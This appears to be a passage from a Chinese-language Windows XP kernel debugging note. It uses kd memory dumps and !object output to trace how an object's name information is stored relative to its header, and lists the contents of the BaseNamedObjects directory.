        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

kd> dd e17fedf0
e17fedf0  00000004 00000003 80f0a040 00200010
e17fee00  ffb75270 e155114d 00000000 00000000
e17fee10  00000000 00000000 00000000 e1aec0a0
e17fee20  00080000 00000000 00011000 00000004
e17fee30  0001020d 61564d43 0c020201 49564d43
e17fee40  8000cab0 e1ac58b9 0c030202 3066744e
e17fee50  e1446390 e17292d8 085aba89 00000032
e17fee60  0c0d0203 61444d43 00240001 000e6b76

NameInfoOffset的值为0×10
在jiurl的文章里说在2000里NAME的结构是
typedef struct _OBJECT_NAME
{
/*000*/ POBJECT_DIRECTORY Directory;
/*004*/ UNICODE_STRING Name;
/*00C*/ DWORD Reserved;
/*010*/ }
OBJECT_NAME;
xp下没有这个名字的结构,看可以看出结构还是原来的那样
kd> dd e17fedf0-10
e17fede0  e14ce6c8 00280028 e1787320 00000001
e17fedf0  00000004 00000003 80f0a040 00200010
e17fee00  ffb75270 e155114d 00000000 00000000
e17fee10  00000000 00000000 00000000 e1aec0a0
e17fee20  00080000 00000000 00011000 00000004
e17fee30  0001020d 61564d43 0c020201 49564d43
e17fee40  8000cab0 e1ac58b9 0c030202 3066744e
e17fee50  e1446390 e17292d8 085aba89 00000032
kd> du e1787320
e1787320  "MSCTF.Shared.SFM.EBCІం潉捃Ḙᄍ"
kd> !object e14ce6c8
Object: e14ce6c8  Type: (80f44ca0) Directory
    ObjectHeader: e14ce6b0
    HandleCount: 16  PointerCount: 185
    Directory Object: e1000640  Name: BaseNamedObjects

    Hash Address  Type          Name
    —- ——-  —-          —-
     00  e13aeb88 SymbolicLink  Local
         ffb1a0f8 Mutant        ZonesCacheCounterMutex
         ffb17d90 Event         WINMGMT_COREDLL_UNLOADED
         80dfda30 Event         userenv: Machine Group Policy has been applied
         ffb794a0 Event         userenv: machine policy force refresh event
         ffba4a70 Event         AgentToWkssvcEvent
         ffba4b30 Event         jjCSCSessEvent_UM_KM_0
     01  e169f040 Section       CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-776561741-

839522115-1003SFM.DefaultS-1-5-21-1390067357-776561741-839522115-1003
         80e23ec8 Event         TermSrvReadyEvent
         ffb5ec78 Event         SRIdleReqEvent
         ffb70790 Mutant        0CADFD67AF62496dB34264F000F5624A
         ffba5138 Mutant        WPA_RT_MUTEX
….